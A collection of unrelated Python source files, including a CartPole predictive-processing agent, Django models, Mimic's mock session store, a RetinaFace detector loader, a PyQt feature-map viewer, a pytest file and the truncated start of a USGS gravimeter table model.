        the original docstring said POST -- confirm against the router).
        """
        raise tornado.web.HTTPError(501, "Not implemented yet.")
|
# A provider for performing the necessary SPARQL queries.
# This was taken from the interim wikidata fuzzysearch backend, and is not fully working at all, which is
# why this file is commented out
# class SPARQLProvider:
# def query_variable(self, dataset, variable):
# query = f'''
# select ?dataset_id ?variable_id ?variable_name ?property_id
# where {{
# ?dataset_ wdt:P1813 ?dname .
# FILTER (str(?dname) = "{dataset}")
# ?variable_ wdt:P361 ?d .
# ?variable_ wdt:P1813 ?vname .
# ?variable_ rdfs:label ?variable_name .
# FILTER (str(?vname) = "{variable}")
# ?variable_ wdt:P1687 ?property_ .
# BIND(REPLACE(STR(?dataset_), "(^.*)(Q.+$)", "$2") AS ?dataset_id)
# BIND(REPLACE(STR(?variable_), "(^.*)(Q.+$)", "$2") AS ?variable_id)
# BIND(REPLACE(STR(?property_), "(^.*)(Q.+$)", "$2") AS ?property_id)
# }}
# '''
# print(query)
# sparql.setQuery(query)
# sparql.setReturnFormat(JSON)
# result = sparql.query()
# response = result.convert()
# print(response)
# if response['results']['bindings']:
# binding = response['results']['bindings'][0]
# return {
# 'dataset_id': binding['dataset_id']['value'],
# 'variable_id': binding['variable_id']['value'],
# 'property_id': binding['property_id']['value'],
# 'variable_name': binding['variable_name']['value']
# }
# return {}
# def query_qualifiers(self, variable_id, property_id):
# query = f'''
# select ?qualifier_id ?qual_name
# where {{
# wd:{variable_id} p:{property_id} ?st .
# ?st ps:{property_id} ?qual_ .
# ?st pq:P1932 ?qual_name .
# BIND(REPLACE(STR(?qual_), "(^.*)(P.+$)", "$2") AS ?qualifier_id)
# }}
# '''
# print(query)
# sparql.setQuery(query)
# sparql.setReturnFormat(JSON)
# result = sparql.query()
# response = result.convert()
# print(response)
# qualifiers = {binding['qualifier_id']['value']:binding['qual_name']['value']
# for binding in response['results']['bindings']}
# return qualifiers
# def query_data(self, dataset_id, property_id, places, qualifiers, limit, cols):
# # Places are not implemented in SPARQL yet
# select_columns = '?dataset ?main_subject_id ?value ?value_unit ?time ?coordinate ' + ' '.join(f'?{name}_id' for name in qualifiers.values())
# qualifier_query = ''
# for pq_property, name in qualifiers.items():
# qualifier_query += f'''
# ?o {pq_property} ?{name}_ .
# BIND(REPLACE(STR(?{name}_), "(^.*)(Q.\\\\d+$)", "$2") AS ?{name}_id)
# '''
# dataset_query = self._get_direct_dataset_query(
# property_id, select_columns, qualifier_query, limit)
# print(dataset_query)
# sparql.setQuery(dataset_query)
# sparql.setReturnFormat(JSON)
# result = sparql.query()
# response = result.convert()
# parsed = self._parse_response(response, dataset_id, cols)
# return parsed
# def _get_direct_dataset_query(self, property_id, select_columns, qualifier_query, limit):
# dataset_query = f'''
# SELECT {select_columns} WHERE {{
# VALUES(?property_id_ ?p ?ps ?psv) {{
# (wd:{property_id} p:{property_id} ps:{property_id} psv:{property_id})
# }}
# ?main_subject_ ?p ?o .
# # ?o ?ps ?value .
# ?o ?psv ?value_obj .
# ?value_obj wikibase:quantityAmount ?value .
# optional {{
# ?value_obj wikibase:quantityUnit ?unit_id .
# ?unit_id rdfs:label ?value_unit .
# FILTER(LANG(?value_unit) = "en")
# }}
# ?o pq:P585 ?time .
# optional {{
# ?main_subject_ wdt:P625 ?coordinate
# }}
# optional {{
# ?o pq:P2006020004 ?dataset_ .
# BIND(REPLACE(STR(?dataset_), "(^.*/)(Q.*)", "$2") as ?dataset)
# }}
# {qualifier_query}
# BIND(REPLACE(STR(?main_subject_), "(^.*/)(Q.*)", "$2") AS ?main_subject_id)
# }}
# ORDER BY ?main_subject_id ?time
# '''
# if limit > -1:
# dataset_query = dataset_query + f'\nLIMIT {limit}'
# print(dataset_query)
# return dataset_query
# def _parse_response(self, response, dataset_id, cols):
# results = []
# # for row, record in enumerate(response['results']['bindings']):
# for record in response['results']['bindings']:
# record_dataset = ''
# if 'dataset' in record:
# record_dataset = record['dataset']['value']
# # Skip record if dataset does not match
# if record_dataset != dataset_id:
# # Make an exception for Wikidata, which does not have a dataset field
# if dataset_id == 'Wikidata' and record_dataset == '':
# pass
# else:
# print(f'Skipping: not {record_dataset} == Q{dataset_id}')
# # continue
# result = {}
# for col_name, typed_value in record.items():
# value = typed_value['value']
# if col_name in cols:
# result[col_name] = value
# # col = result_df.columns.get_loc(col_name)
# # result_df.iloc[row, col] = value
# if col_name not in COMMON_COLUMN.keys():
# # remove suffix '_id'
# qualifier = col_name[:-3]
# if qualifier not in cols:
# continue
# result[qualifier] = labels.get(value, value)
# # if value in metadata['qualifierLabels']:
# # result[qualifier] = metadata['qualifierLabels'][value]
# # # result_df.iloc[row, result_df.columns.get_loc(qualifier)] = metadata['qualifierLabels'][value]
# # else:
# # print('missing qualifier label: ', value)
# # result[qualifier] = value
# results.append(result)
# return results
|
import logging
import gym
import matplotlib.pyplot as plt
import numpy as np
from gym import logger
from peepo.pp.generative_model import GenerativeModel
from peepo.pp.genetic_algorithm import GeneticAlgorithm
from peepo.pp.peepo import Peepo
from peepo.pp.peepo_network import write_to_file
VISION = 'vision'
MOTOR = 'motor'
class PeepoAgent(Peepo):
    """Predictive-processing agent bridging a peepo GenerativeModel with an
    OpenAI Gym environment (assumes a 4-dimensional observation, as in
    CartPole -- TODO confirm for other envs)."""
    def __init__(self, network, action_space, observation_space):
        super().__init__(network)
        self.action_space = action_space
        self.observation_space = observation_space
        # Latest environment observation (4 floats), reward and done flag.
        self.obs = np.empty(4)
        self.reward = 0
        self.done = False
        # Last chosen action index; read by observation(), set by action().
        self.act = 0
        self.generative_model = GenerativeModel(self, n_jobs=4)
    def update(self, obz, rewardz, donez):
        """Store the latest env feedback, run one inference step, and return
        the chosen action."""
        self.obs = obz
        self.reward = rewardz
        self.done = donez
        self.generative_model.process()
        return self.act
    def observation(self, name):
        """Return a 2-element distribution for the named network node,
        derived from either the observation quadrant or the last action."""
        if VISION.lower() in name.lower():
            quad = self.get_quadrant(name)
            return self.normalized_distribution(self.obs[quad],
                                                self.observation_space.low[quad],
                                                self.observation_space.high[quad])
        if MOTOR.lower() in name.lower():
            return [0.1, 0.9] if self.act else [0.9, 0.1]
        # Fallback for unexpected node names: uninformative distribution.
        logging.warning('Reached code which should not be reached in observation')
        return [0.5, 0.5]
    def action(self, node, prediction):
        # Pick the action with highest predicted probability.
        self.act = np.argmax(prediction)
    @staticmethod
    def normalized_distribution(value, mini, maxi, target_min=0, target_max=1):
        """Scale *value* from [mini, maxi] to [target_min, target_max] and
        return it as a 2-element complementary distribution [x, 1 - x]."""
        # Gym reports unbounded dims as float32 max; presumably those values
        # stay within [-1, 1] in practice -- TODO confirm.
        if str(maxi) == '3.4028235e+38':
            mini, maxi = -1, 1
        x = target_max * ((value - mini) / (maxi - mini)) + target_min
        return np.array([x, 1 - x])
    @staticmethod
    def get_quadrant(name):
        """Extract the observation index (0-3) embedded in a node name."""
        for quad in ['0', '1', '2', '3']:
            if quad.lower() in name.lower():
                return int(quad)
        raise ValueError('Unexpected node name %s, could not find 0,1,2,3', name)
if __name__ == '__main__':
    # Evolve peepo networks on CartPole with a genetic algorithm, then save
    # the best network and plot average fitness per generation.
    logger.set_level(logger.INFO)
    env = gym.make('CartPole-v1')
    # env = gym.make('BipedalWalker-v2')
    env.seed(0)
    reward = 0
    done = False
    max_age = 100
    num_individuals = 10
    num_generations = 30
    ga = GeneticAlgorithm('cartpole',
                          p_mut_top=0.2,
                          p_mut_cpd=0.2,
                          Npop=num_individuals,
                          max_removal=2)
    population = ga.get_population()
    avg_fitnesses = []
    for gen in range(num_generations):
        for i, idv in enumerate(population):
            agent = PeepoAgent(idv[1], env.action_space, env.observation_space)
            ob = env.reset()
            while True:
                action = agent.update(ob, reward, done)
                ob, reward, done, _ = env.step(action)
                # env.render()
                if done:
                    # Episode's final reward becomes the individual's fitness.
                    population[i][0] = reward
                    ob = env.reset()
                    break
        avg_fitness, population, converging = ga.evolve(population)
        if avg_fitness < 0:
            print(' population collapsed :-(')
            break
        # BUG FIX: avg_fitness is numeric, so the original
        # 'Generation: ' + str(gen) + ' , Average fitness: ' + avg_fitness
        # raised TypeError (str + float). Use an f-string instead.
        print(f'Generation: {gen} , Average fitness: {avg_fitness}')
        avg_fitnesses.append(avg_fitness)
    env.close()
    final_network, best_fitness = ga.get_optimal_network()
    write_to_file('best_cartpole_network', final_network)
    # Plot the fitness trajectory over generations.
    t = np.arange(0.0, len(avg_fitnesses), 1)
    fig, ax = plt.subplots()
    ax.plot(t, avg_fitnesses)
    ax.set(xlabel='generation', ylabel='average fitness',
           title='Survival with genetic algorithm')
    ax.grid()
    plt.show()
|
from django.db import models
class Book(models.Model):
    """A book with a title and a published/unpublished flag."""
    title = models.CharField(max_length=250)
    is_published = models.BooleanField(default=False)
class BlogPost(models.Model):
    """A blog post with a title and a published/unpublished flag."""
    title = models.CharField(max_length=250)
    is_published = models.BooleanField(default=False)
|
# -*- test-case-name: mimic.test.test_session -*-
"""
Implementation of simple in-memory session storage and generation for Mimic.
"""
from __future__ import absolute_import, division, unicode_literals
from six import text_type
from uuid import uuid4
from datetime import datetime, timedelta
import attr
@attr.s
class Session(object):
    """
    A mimic Session is a record of an authentication token for a particular
    username and tenant_id.
    """
    username = attr.ib()
    token = attr.ib()
    tenant_id = attr.ib()
    expires = attr.ib()
    # Maps impersonation token -> the impersonator's Session.
    impersonator_session_map = attr.ib(default=attr.Factory(dict))
    # Maps API mock -> per-API application data (created lazily).
    _api_objects = attr.ib(default=attr.Factory(dict))
    @property
    def user_id(self):
        """
        Return a unique numeric ID based on the username.
        """
        return text_type(hash(self.username))
    def impersonator_session_for_token(self, impersonated_token):
        """
        :param impersonated_token: impersonation token for a user.
        Returns the impersonator session for the given impersonation
        token, or None if the token is unknown.
        """
        return self.impersonator_session_map.get(impersonated_token)
    def data_for_api(self, api_mock, data_factory):
        """
        Get the application data for a given API, creating it if necessary.
        (``data_factory`` is only called on first access for an API.)
        """
        if api_mock not in self._api_objects:
            self._api_objects[api_mock] = data_factory()
        return self._api_objects[api_mock]
@attr.s
class NonMatchingTenantError(Exception):
    """
    A session's tenant ID does not match the desired tenant ID.
    """
    # The session that was found for the credentials.
    session = attr.ib(validator=attr.validators.instance_of(Session))
    # The tenant ID the caller asked for, which did not match.
    desired_tenant = attr.ib()
class SessionStore(object):
    """
    A collection of sessions addressable by multiple different keys.
    Unlike many traditional types of session storage, new authenticated users
    are created on demand, since all authentication succeeds by default within
    Mimic.
    :ivar IReactorTime clock: The clock used to track session expiration.
    """
    def __init__(self, clock):
        """
        Create a session store with the given IReactorTime provider.
        """
        self.clock = clock
        # The four indexes below all point at the same Session objects;
        # _new_session keeps them in sync.
        self._token_to_session = {
            # mapping of token (unicode) to session (Session)
        }
        self._userid_to_session = {
            # mapping of userid (ascii) to session (Session)
        }
        self._tenant_to_session = {
            # mapping of tenant_id (unicode) to session (Session)
        }
        self._username_to_token = {
            # mapping of username (unicode) to token (unicode: key in
            # _token_to_session)
        }
    def _new_session(self, username_key=None, **attributes):
        """
        Create a new session and persist it according to its username and token
        values.
        :param username_key: Optional key under which to index the session in
            the username map; defaults to the session's own username.
        :param attributes: Keyword parameters containing zero or more of
            ``username``, ``token``, and ``tenant_id``. Any fields that are
            not specified will be filled out automatically.
        :return: A new session with all fields filled out and an expiration
            time 1 day in the future (according to the clock associated
            with this :obj:`MimicCore`).
        :rtype: :obj:`Session`
        """
        for key in ['username', 'token', 'tenant_id']:
            if attributes.get(key, None) is None:
                attributes[key] = key + "_" + text_type(uuid4())
                if key == 'tenant_id':
                    # integer tenant IDs - uuid4 ints are too long
                    attributes[key] = text_type(int(uuid4().int % 1e15))
        if 'expires' not in attributes:
            attributes['expires'] = (
                datetime.utcfromtimestamp(self.clock.seconds())
                + timedelta(days=1)
            )
        session = Session(**attributes)
        if username_key is None:
            username_key = session.username
        # Register the session under every index so any key resolves to it.
        self._username_to_token[username_key] = session.token
        self._token_to_session[session.token] = session
        self._userid_to_session[session.user_id] = session
        self._tenant_to_session[session.tenant_id] = session
        return session
    def _assert_tenant_matches(self, session, tenant_id):
        # Guard: a caller-supplied tenant_id must agree with the session it
        # resolved to; None means "no tenant constraint".
        if tenant_id is not None and session.tenant_id != tenant_id:
            raise NonMatchingTenantError(session=session, desired_tenant=tenant_id)
    def session_for_token(self, token, tenant_id=None):
        """
        :param unicode token: An authentication token previously created by
            session_for_api_key or session_for_username_password, or a new
            token initialized outside Mimic.
        :param tenant_id: Optional tenant the session must belong to.
        :return: a session for the given token.
        :rtype: Session
        """
        if token in self._token_to_session:
            s = self._token_to_session[token]
            self._assert_tenant_matches(s, tenant_id)
        elif tenant_id and tenant_id in self._tenant_to_session:
            # Unknown token but known tenant: reuse the tenant's session.
            # NOTE(review): the supplied token is not registered in
            # _token_to_session here — confirm that is intentional.
            s = self._tenant_to_session[tenant_id]
        else:
            s = self._new_session(token=token, tenant_id=tenant_id)
        return s
    def existing_session_for_token(self, token):
        """
        :param unicode token: An authentication token previously created by
            session_for_api_key, session_for_username_password, or
            get_or_create_session_for_token.
        :return: a session for the given token, only if that token already
            exists.
        :rtype: Session
        :raise: :obj:`KeyError` if no such thing exists.
        """
        if token in self._token_to_session:
            return self._token_to_session[token]
        raise KeyError(token)
    def session_for_api_key(self, username, api_key, tenant_id=None):
        """
        Create or return a :obj:`Session`.
        :param unicode username: A user name.
        :param unicode api_key: An API key that should match the username.
        :return: a session for the given user.
        :rtype: Session
        """
        # One day, API keys will be different from passwords, but not today.
        return self.session_for_username_password(username, api_key, tenant_id)
    def session_for_username_password(self, username, password,
                                      tenant_id=None):
        """
        Create or return a :obj:`Session` based on a user's credentials.
        Note that the password is never checked: all authentication succeeds
        within Mimic.
        """
        if username in self._username_to_token:
            s = self._token_to_session[self._username_to_token[username]]
            self._assert_tenant_matches(s, tenant_id)
            return s
        if tenant_id and tenant_id in self._tenant_to_session:
            return self._tenant_to_session[tenant_id]
        return self._new_session(username=username,
                                 tenant_id=tenant_id)
    def session_for_impersonation(self, username, expires_in, impersonator_token=None,
                                  impersonated_token=None):
        """
        Create or return a :obj:`Session` impersonating a given user; this
        session updates the expiration to be that indicated.
        """
        impersonator_session = self._token_to_session.get(impersonator_token)
        session = self.session_for_username_password(
            username, "lucky we don't check passwords, isn't it"
        )
        # The impersonated session expires as requested, and the
        # impersonation token resolves directly to it.
        session.expires = datetime.utcfromtimestamp(self.clock.seconds() + expires_in)
        session.impersonator_session_map[impersonated_token] = impersonator_session
        self._token_to_session[impersonated_token] = session
        return session
    def session_for_tenant_id(self, tenant_id, token_id=None):
        """
        Looks up a session based on the tenant_id.
        :param unicode tenant_id: The tenant_id of a previously-created
            session.
        :param unicode token_id: Sets token in the session to the token_id provided,
            else, creates one.
        """
        if tenant_id not in self._tenant_to_session:
            return self._new_session(tenant_id=tenant_id, token=token_id)
        return self._tenant_to_session[tenant_id]
|
import numpy as np
import mxnet as mx
from mxnet.gluon.data import DataLoader
from mxnet.gluon.data.vision import transforms
from pathlib import Path
from .dataset import PrepareDataset
from .transforms import ResizeLong, NonNormalizedTensor
from ..mytypes import Detector, Detections
from typing import Sequence, Generator
def get_retina_det(prefix: Path,
                   epoch: int = 0,
                   resolution: int = 256,
                   batch_size: int = 1,
                   num_workers: int = 0,
                   ctx: mx.Context = mx.cpu()
                   ) -> Detector:
    """Load a RetinaFace-style MXNet checkpoint and return a detection closure.

    :param prefix: checkpoint path prefix passed to ``mx.model.load_checkpoint``
    :param epoch: checkpoint epoch to load
    :param resolution: square input resolution the model was bound with
    :param batch_size: images per forward pass
    :param num_workers: DataLoader worker processes
    :param ctx: MXNet device context (cpu/gpu)
    :return: a generator function over image paths yielding per-image
        (scores, bboxes, landmarks) tuples
    """
    sym, arg_params, aux_params = mx.model.load_checkpoint(str(prefix), epoch)
    model = mx.mod.Module(symbol=sym, context=ctx, label_names=None)
    data_shape = (1, 3, resolution, resolution)
    model.bind(data_shapes=[('data', data_shape)], for_training=False)
    model.set_params(arg_params, aux_params)
    # warmup: one dummy forward pass so lazy allocation/JIT cost is paid here
    data = mx.nd.zeros(data_shape)
    model.forward(mx.io.DataBatch(data=(data,)), is_train=False)
    model.get_outputs()[0].asnumpy()
    # end of warmup
    detector_transform = transforms.Compose([
        ResizeLong(resolution),
        NonNormalizedTensor()
    ])
    def prepare_data(img_list: Sequence[Path]) -> DataLoader:
        # Wrap the image paths in a DataLoader applying the detector transform.
        data = DataLoader(PrepareDataset(img_list).transform_first(detector_transform),
                          num_workers=num_workers,
                          batch_size=batch_size,
                          pin_memory=ctx.device_type == 'gpu',
                          last_batch='keep')
        return data
    def detect(img_list: Sequence[Path]) -> Generator[Detections, None, None]:
        # Run batched inference and yield one detection tuple per image.
        data = prepare_data(img_list)
        for img_batch, idx_batch, width_batch, height_batch in data:
            model.forward(mx.io.DataBatch(data=(img_batch.as_in_context(ctx),)), is_train=False)
            results = model.get_outputs()[0].asnumpy()
            # Output column layout: 1 = score, 2:6 = bbox, 6: = landmark pairs.
            scores = results[:, :, 1]
            bboxes = results[:, :, 2:6]
            landmarks = results[:, :, 6:]
            num_landmarks = landmarks.shape[2] // 2
            landmarks = landmarks.reshape((scores.shape[0], scores.shape[1], num_landmarks, 2))
            for img_idx, width, height, cur_scores, cur_bboxes, cur_landmarks in \
                    zip(idx_batch, width_batch, height_batch, scores, bboxes, landmarks):
                # NOTE(review): max() of two numpy arrays relies on
                # single-element truthiness; assumes width/height are scalar
                # NDArrays — confirm against PrepareDataset.
                max_size = max(width.asnumpy(), height.asnumpy())
                # Drop near-zero-score proposals and rescale coordinates
                # (model outputs are normalized to the long image side).
                filtered_idx = cur_scores > 1e-6
                cur_scores = cur_scores[filtered_idx]
                cur_bboxes = cur_bboxes[filtered_idx] * max_size
                cur_landmarks = cur_landmarks[filtered_idx] * max_size
                yield cur_scores, cur_bboxes, cur_landmarks
    return detect
def get_retina_mnet(*args, resolution: int = 256, **kwargs):
    """Detector backed by the mobilenet-0.25 RetinaFace checkpoint in ~/models."""
    checkpoint = Path.home() / 'models' / 'det_mnet025_{}'.format(resolution)
    return get_retina_det(checkpoint, *args, resolution=resolution, **kwargs)
def get_retina_resnet50(*args, resolution: int = 512, **kwargs):
    """Detector backed by the ResNet-50 RetinaFace checkpoint in ~/models."""
    checkpoint = Path.home() / 'models' / 'det_r50_{}'.format(resolution)
    return get_retina_det(checkpoint, *args, resolution=resolution, **kwargs)
|
"""
Author: Ioannis Paraskevakos
License: MIT
Copyright: 2018-2019
"""
from .discovery import Discovery # noqa:F401
from .image_disc import image_discovery # noqa:F401
|
'''
Created on Jun 18, 2018
@author: rameshpr
'''
from PyQt4 import QtCore, QtGui
import os
import cv2
import numpy as np
from libs import FeatureExtractor
from libs.common import image_path, Sizes, MODEL_TYPE
class MainWindow(QtGui.QMainWindow):
    """Browser for per-layer CNN feature maps of a folder of query images.

    A background ``FeatureExtractor`` thread computes the layer outputs of
    the current image; a grid of labels shows one "sheet" (page) of
    feature-map channels for the layer selected in the combo box.
    """
    def __init__(self):
        QtGui.QMainWindow.__init__(self)
        self.i = 0        # index of the current query image in self.images
        self.page_i = 0   # current sheet (page) of feature-map channels
        self.layer_i = 0  # index of the currently selected layer
        self.__outs = None  # per-layer outputs, filled in by __finished()
        self.__thread = FeatureExtractor(MODEL_TYPE.DENSENET161, median=0)
        self.__thread.finished.connect(self.__finished)
        self.images = [os.path.join(image_path, f) for f in os.listdir(image_path)]
        self.images = [f for f in self.images if f.endswith(".jpg") and os.path.isfile(f)]
        self.__setup()
    def __load_features(self):
        """Start feature extraction for the current image, unless busy."""
        if self.__thread.isRunning():
            return
        self.__thread.set_image(self.images[self.i])
        self.__thread.start()
    def __next_img_button_clicked(self):
        self.setEnabled(False)
        self.i += 1
        # Clamp at the last image (mirrors the lower clamp in the "prev"
        # handler); previously self.i could run past the end and raise
        # IndexError in __load_features.
        if self.i >= len(self.images):
            self.i = len(self.images) - 1
        self.__load_features()
    def __prev_img_button_clicked(self):
        self.setEnabled(False)
        self.i -= 1
        if self.i < 0:
            self.i = 0
        self.__load_features()
    def __layer_combobox_changed(self, index):
        self.setEnabled(False)
        self.layer_i = int(index)
        self.show_images()
    def __prev_sheet_button_clicked(self):
        self.setEnabled(False)
        self.page_i -= 1
        if self.page_i < 0:
            self.page_i = 0
        self.show_images()
    def __next_sheet_button_clicked(self):
        self.setEnabled(False)
        self.page_i += 1
        self.show_images()
    def __setup(self):
        """Build the widget layout: query/controls panel plus image grid."""
        self.__load_features()
        button_panel = QtGui.QWidget(self)
        image_panel = QtGui.QWidget(self)
        # Query image preview.
        self.__qurryLabel = QtGui.QLabel(button_panel)
        self.__qurryLabel.resize(Sizes.querry_x, Sizes.querry_y)
        self.__qurryLabel.setScaledContents(True)
        self.__qurryLabel.move(10, 15)
        self.__prevImgButton = QtGui.QPushButton("Prev Image", button_panel)
        self.__prevImgButton.clicked.connect(self.__prev_img_button_clicked)
        self.__prevImgButton.resize(100, 25)
        self.__prevImgButton.move(10, Sizes.querry_y + 25)
        self.__nextImgButton = QtGui.QPushButton("Next Image", button_panel)
        self.__nextImgButton.clicked.connect(self.__next_img_button_clicked)
        self.__nextImgButton.resize(100, 25)
        self.__nextImgButton.move(113, Sizes.querry_y + 25)
        self.__selectLayerLabel = QtGui.QLabel("Select Layer", button_panel)
        self.__selectLayerLabel.adjustSize()
        self.__selectLayerLabel.move(10, Sizes.querry_y + 60)
        self.__layerComboBox = QtGui.QComboBox(button_panel)
        self.__layerComboBox.currentIndexChanged.connect(self.__layer_combobox_changed)
        self.__layerComboBox.resize(100, 25)
        self.__layerComboBox.move(113, Sizes.querry_y + 55)
        self.__prevSheetButton = QtGui.QPushButton("Prev Sheet", button_panel)
        self.__prevSheetButton.clicked.connect(self.__prev_sheet_button_clicked)
        self.__prevSheetButton.resize(100, 25)
        self.__prevSheetButton.move(10, Sizes.querry_y + 85)
        self.__nextSheetButton = QtGui.QPushButton("Next Sheet", button_panel)
        self.__nextSheetButton.clicked.connect(self.__next_sheet_button_clicked)
        self.__nextSheetButton.resize(100, 25)
        self.__nextSheetButton.move(113, Sizes.querry_y + 85)
        # Grid of feature-map labels, n_cols x n_rows, laid out left-to-right.
        self.__imageLabels = []
        for i in range(Sizes.n_cols * Sizes.n_rows):
            self.__imageLabels.append(QtGui.QLabel(image_panel))
            self.__imageLabels[i].setScaledContents(True)
            self.__imageLabels[i].resize(Sizes.image_x, Sizes.image_y)
            x = i % Sizes.n_cols
            y = int(i / Sizes.n_cols)
            self.__imageLabels[i].move(3 * (x + 1) + Sizes.image_x * x, 3 * (y + 1) + Sizes.image_y * y)
        self.__infoLabel = QtGui.QLabel("", self)
        self.__infoLabel.adjustSize()
        image_panel.resize(Sizes.n_cols * (Sizes.image_x + 3), Sizes.n_rows * (Sizes.image_y + 3))
        button_panel.resize(max(Sizes.querry_x + 20, 223), max(Sizes.querry_y + 110, image_panel.height()))
        button_panel.move(0, 0)
        self.__infoLabel.move(button_panel.width(), 0)
        image_panel.move(button_panel.width(), 15)
        # Disabled until the first extraction finishes (__finished re-enables).
        self.setEnabled(False)
        self.resize(image_panel.width() + button_panel.width() + 10, max(image_panel.height() + 20, button_panel.height()) + 10)
    def show_images(self):
        """Render the current page of channels for the selected layer."""
        self.__infoLabel.setText("Image %s ::> Layer: %d and page: %d" % (self.images[self.i].split('/')[-1], self.layer_i, self.page_i))
        self.__infoLabel.adjustSize()
        for image_label in self.__imageLabels:
            image_label.clear()
        limit = len(self.__imageLabels)
        j = 0
        for i in range(self.page_i * limit, (self.page_i + 1) * limit):
            # Layers with fewer than 3 dims have no channel axis to page over.
            if len(self.__outs[self.layer_i][0].shape) < 3:
                break
            if i >= self.__outs[self.layer_i][0].shape[2]:
                # Ran past the last channel; if the page is entirely empty,
                # step back one page and re-render.
                if i == self.page_i * limit:
                    self.page_i -= 1
                    self.show_images()
                break
            self.__imageLabels[j].setPixmap(self.convert_image(self.__outs[self.layer_i][0][:, :, i]))
            j += 1
        self.setEnabled(True)
    def __finished(self):
        """Slot: extraction finished — refresh the preview and the grid."""
        if self.__thread is None:
            return
        self.__qurryLabel.setPixmap(self.convert_image(self.__thread.input_image))
        self.__outs = self.__thread.outputs
        # Populate the layer selector only once. QComboBox does not support
        # len(); the original `len(self.__layerComboBox)` raised TypeError,
        # so use count() instead.
        if self.__layerComboBox.count() == 0:
            self.__layerComboBox.addItems([str(i) for i in range(len(self.__outs))])
        self.show_images()
    def convert_image(self, cv_img):
        """Normalize an arbitrary 2-D/3-channel array to [0, 255] and wrap it
        in a QPixmap (BGR input is converted to RGB in place)."""
        cv_img = cv_img.astype(np.float32)
        cv_img = cv_img - np.min(cv_img)
        img_max = np.max(cv_img)
        if img_max != 0:
            cv_img = 255 * cv_img / img_max
        cv_img = cv_img.astype(np.uint8)
        if len(cv_img.shape) == 2:
            # Grayscale: replicate to 3 channels for RGB888 display.
            cv_img = np.expand_dims(cv_img, axis=2)
            cv_img = np.repeat(cv_img, 3, axis=2)
        height, width, bytesPerComponent = cv_img.shape
        bytesPerLine = bytesPerComponent * width
        cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB, cv_img)
        return QtGui.QPixmap.fromImage(QtGui.QImage(cv_img.data, width, height, bytesPerLine, QtGui.QImage.Format_RGB888))
|
from ..utils import action, results_formatter
from functools import partial
import arep
import pytest
import os
# Bind this test file's name into the shared formatter once.
results_formatter = partial(results_formatter, name=os.path.basename(__file__))
# Expected (line, column) hits in tests/data/Action/Yielding.py, one result
# set per flavour of yield.
results_in_comprehension = results_formatter({
    (3, 5)
})
results_regular = results_formatter({
    (8, 8)
})
results_yield_from = results_formatter({
    (12, 4)
})
# Union of every expected hit; tests narrow this down per parametrization.
all_results = (results_in_comprehension | results_regular | results_yield_from)
@pytest.fixture
def grepper():
    """Fresh Grepper over the Yielding fixture file for each test."""
    return arep.Grepper(os.path.abspath('tests/data/Action/Yielding.py'))
@pytest.mark.parametrize(('in_expression'), [True, False, None])
@pytest.mark.parametrize(('from_'), [True, False, None])
@pytest.mark.parametrize(('consideration'), [True, None])
def test_Yielding(grepper, action, consideration, from_, in_expression):
    """Check Yielding search results across constraint combinations."""
    # NOTE(review): the action is reset and appended only when all three
    # parameters are truthy; other combinations appear to reuse state from
    # a previous parametrization of the shared `action` — confirm intended.
    if all([consideration, from_, in_expression]):
        action.reset()
        action.Yielding.in_expression = in_expression
        action.Yielding.from_ = from_
        action.Yielding.consideration = consideration
        grepper.constraint_list.append(action)
    # `consideration` is only ever True or None here, so this guard always
    # passes with the current parametrization.
    if consideration is not False:
        results = all_results.copy()
        # Narrow the expected set: True keeps only that flavour, False
        # removes it, None leaves the set unchanged.
        if from_:
            results &= results_yield_from
        elif from_ is False:
            results -= results_yield_from
        if in_expression:
            results &= results_in_comprehension
        elif in_expression is False:
            results -= results_in_comprehension
        assert set(grepper.all_results()) == results
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : AppZoo.
# @File : demo
# @Time : 2020/11/5 8:19 下午
# @Author : yuanjie
# @Email : yuanjie@xiaomi.com
# @Software : PyCharm
# @Description :
from appzoo import App
app = App()  # appzoo application instance; routes are registered below
if __name__ == '__main__':
    # Register a catch-all GET endpoint returning a constant greeting under
    # the "result" key, then serve on port 9955.
    app.add_route('/', lambda **kwargs: "Hello World", method="GET", result_key="result")
    app.run(port=9955)
|
"""
models/scintrex.py
==================
PyQt model for Scintrex relative gravimeter data.
--------------------------------------------------------------------------------
NB: PyQt models follow the PyQt CamelCase naming convention. All other
methods/functions in GSadjust use PEP-8 lowercase_underscore convention.
This software is preliminary, provisional, and is subject to revision. It is
being provided to meet the need for timely best science. The software has not
received final approval by the U.S. Geological Survey (USGS). No warranty,
expressed or implied, is made by the USGS or the U.S. Government as to the
functionality of the software and related material nor shall the fact of release
constitute any such warranty. The software is provided on the condition that
neither the USGS nor the U.S. Government shall be held liable for any damages
resulting from the authorized or unauthorized use of the software.
"""
import numpy as np
from matplotlib.dates import num2date
from PyQt5 import QtCore
from PyQt5.QtCore import Qt, QModelIndex
# Constants for column headers
# Station tree-view columns.
STATION_NAME, STATION_DATETIME, STATION_MEAN = range(3)
LOOP_NAME = 0
SURVEY_NAME = 0
# Adjusted-station table columns.
ADJSTA_STATION, ADJSTA_G, ADJSTA_SD = range(3)
# Scintrex data-table column order; must match the arraydata layout built in
# ScintrexTableModel.createArrayData.
(
    SCINTREX_STATION,
    SCINTREX_DATE,
    SCINTREX_G,
    SCINTREX_SD,
    SCINTREX_X_TILT,
    SCINTREX_Y_TILT,
    SCINTREX_TEMP,
    SCINTREX_DUR,
    SCINTREX_REJ,
) = range(9)
class ScintrexTableModel(QtCore.QAbstractTableModel):
    """
    Model to store Scintrex data.
    There is one ScintrexTableModel (or BurrisTableModel) per station occupation.
    The model is created dynamically each time a station is selected in the tree
    view on the data tab, rather than stored in memory.
    The station position in the data hierarchy are stored, so that if a
    modification is triggered, the original data can be accessed and changed
    accordingly (keysurv,keyloop,keysta)
    by default, all table entries are checked (this can be modified to allow
    pre-check based on user criteria (tiltx, tilty,...)). Then, if one is
    unchecked, the keepdata property of the ChannelList object at the table
    row position is set to 0
    Attributes
    ----------
    _headers: table header
    unchecked: a dictionary of unchecked items. Keys are item
        indexes, entries are states
    ChannelList_obj: an object of ChannelList-type: used to store the
        table data as the structured data
    arraydata: an array representation of the data from the
        ChannelList_obj
    """
    # Column header labels, keyed by the SCINTREX_* column constants.
    _headers = {
        SCINTREX_STATION: "Station",
        SCINTREX_DATE: "Date",
        SCINTREX_G: "g (\u00b5gal)",
        SCINTREX_SD: "sd (\u00b5gal)",
        SCINTREX_X_TILT: "X Tilt",
        SCINTREX_Y_TILT: "Y Tilt",
